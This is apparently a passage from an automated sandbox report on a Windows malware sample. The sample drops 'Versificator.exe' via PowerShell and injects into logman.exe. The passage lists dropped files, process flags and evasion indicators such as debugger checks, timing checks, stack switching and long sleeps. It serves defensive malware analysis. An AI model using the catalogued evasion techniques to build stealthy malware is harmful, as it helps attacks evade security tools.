            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeCode function: 14_2_048D5A93 push ecx; iretd 14_2_048D5A48
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeCode function: 14_2_048C32E8 pushfd ; ret 14_2_048C32E9
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeCode function: 14_2_048C8B87 push 00000028h; ret 14_2_048C8B89
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_030A225F pushad ; ret 15_2_030A27F9
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_030A27FA pushad ; ret 15_2_030A27F9
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_030D09AD push ecx; mov dword ptr [esp], ecx15_2_030D09B6
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_030A283D push eax; iretd 15_2_030A2858
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_030A1366 push eax; iretd 15_2_030A1369
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_030A9939 push es; iretd 15_2_030A9940
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_0274F32E push ebx; ret 15_2_0274F336
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_02743034 pushfd ; ret 15_2_02743035
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_0274564B push CC412C59h; retf 15_2_02745654
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_027557DF push ecx; iretd 15_2_02755794
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_0275448C push edx; retf 15_2_0275448D
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_0275BAE1 push cs; iretd 15_2_0275BAE5
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_027488D3 push 00000028h; ret 15_2_027488D5
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_02741E3E push ss; ret 15_2_02741E4E
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_0274EC29 push edx; retf 15_2_0274EC2B
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_02751C85 push ecx; iretd 15_2_02751C86
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Versificator.exeJump to dropped file
            Source: C:\Users\user\Desktop\textless.exeFile created: C:\Users\user\AppData\Local\Temp\nss21DC.tmp\nsExec.dllJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\textless.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\textless.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\textless.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\logman.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeAPI/Special instruction interceptor: Address: 2B05AD1
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2127096E rdtsc 11_2_2127096E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7233Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2322Jump to behavior
            Source: C:\Users\user\Desktop\textless.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nss21DC.tmp\nsExec.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeAPI coverage: 0.3 %
            Source: C:\Windows\SysWOW64\logman.exeAPI coverage: 2.2 %
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6004Thread sleep time: -5534023222112862s >= -30000sJump to behavior
            Source: C:\Windows\System32\svchost.exe TID: 2372Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
            Source: C:\Windows\SysWOW64\logman.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\textless.exeCode function: 0_2_00406167 FindFirstFileA,FindClose,0_2_00406167
            Source: C:\Users\user\Desktop\textless.exeCode function: 0_2_00405705 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405705
            Source: C:\Users\user\Desktop\textless.exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\textless.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCacheJump to behavior
            Source: C:\Users\user\Desktop\textless.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\textless.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
            Source: C:\Users\user\Desktop\textless.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
            Source: C:\Users\user\Desktop\textless.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\Users\user\Desktop\textless.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: powershell.exe, 00000001.00000002.1495736567.0000000005398000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
            Source: svchost.exe, 00000004.00000002.2119549686.000002551FA2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWy
            Source: powershell.exe, 00000001.00000002.1495736567.0000000005398000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter@\
            Source: powershell.exe, 00000001.00000002.1495736567.0000000005398000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
            Source: powershell.exe, 00000001.00000002.1495736567.0000000005398000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter@\
            Source: powershell.exe, 00000001.00000002.1495736567.0000000005398000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter@\
            Source: svchost.exe, 00000004.00000002.2121354912.0000025525054000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1916473747.00000000056CD000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000002.2011648145.0000000005678000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000002.2011787884.00000000056CD000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1916621951.00000000056CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: powershell.exe, 00000001.00000002.1495736567.0000000005398000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
            Source: C:\Users\user\Desktop\textless.exeAPI call chain: ExitProcess graph end nodegraph_0-3317
            Source: C:\Users\user\Desktop\textless.exeAPI call chain: ExitProcess graph end nodegraph_0-3474
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\logman.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2127096E rdtsc 11_2_2127096E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07437908 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,1_2_07437908
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21260124 mov eax, dword ptr fs:[00000030h]11_2_21260124
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212DE10E mov eax, dword ptr fs:[00000030h]11_2_212DE10E
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212DE10E mov ecx, dword ptr fs:[00000030h]11_2_212DE10E
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212DE10E mov eax, dword ptr fs:[00000030h]11_2_212DE10E
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212DE10E mov eax, dword ptr fs:[00000030h]11_2_212DE10E
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212DE10E mov ecx, dword ptr fs:[00000030h]11_2_212DE10E
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212DE10E mov eax, dword ptr fs:[00000030h]11_2_212DE10E
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212DE10E mov eax, dword ptr fs:[00000030h]11_2_212DE10E
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212DE10E mov ecx, dword ptr fs:[00000030h]11_2_212DE10E
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212DE10E mov eax, dword ptr fs:[00000030h]11_2_212DE10E
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212DE10E mov ecx, dword ptr fs:[00000030h]11_2_212DE10E
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212DA118 mov ecx, dword ptr fs:[00000030h]11_2_212DA118
